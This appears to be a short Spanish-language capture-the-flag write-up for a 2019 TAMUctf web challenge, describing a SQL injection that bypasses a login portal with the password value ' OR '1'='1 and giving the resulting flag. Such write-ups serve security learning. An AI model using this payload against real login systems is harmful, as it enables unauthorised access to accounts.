Files
ctf/2019/tamu/nasc.md
T
2019-03-05 10:55:24 -06:00

720 B

Not Another SQLi Challenge

(web 100)

http://web1.tamuctf.com


Desarrollo

Para este problema se realizó una inyección SQL a un portal de login, se supuso que la consulta a la base de datos era de las más comunmente empleada, y que de igual forma no se realizaba ningún filtrado de caracteres especiales:

SELECT * FROM usr WHERE usuario='$usr' AND contrasena='$pswd'

Bastaba con formular una oración como la siguiente:

SELECT * FROM usr WHERE usuario='u' AND contrasena='' OR '1' = '1'%%

Se llenaron los campos de la siguiente manera:

Usuario: root

Paswwrod: ' OR '1'='1

Así se obtuvo la flag:

gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}!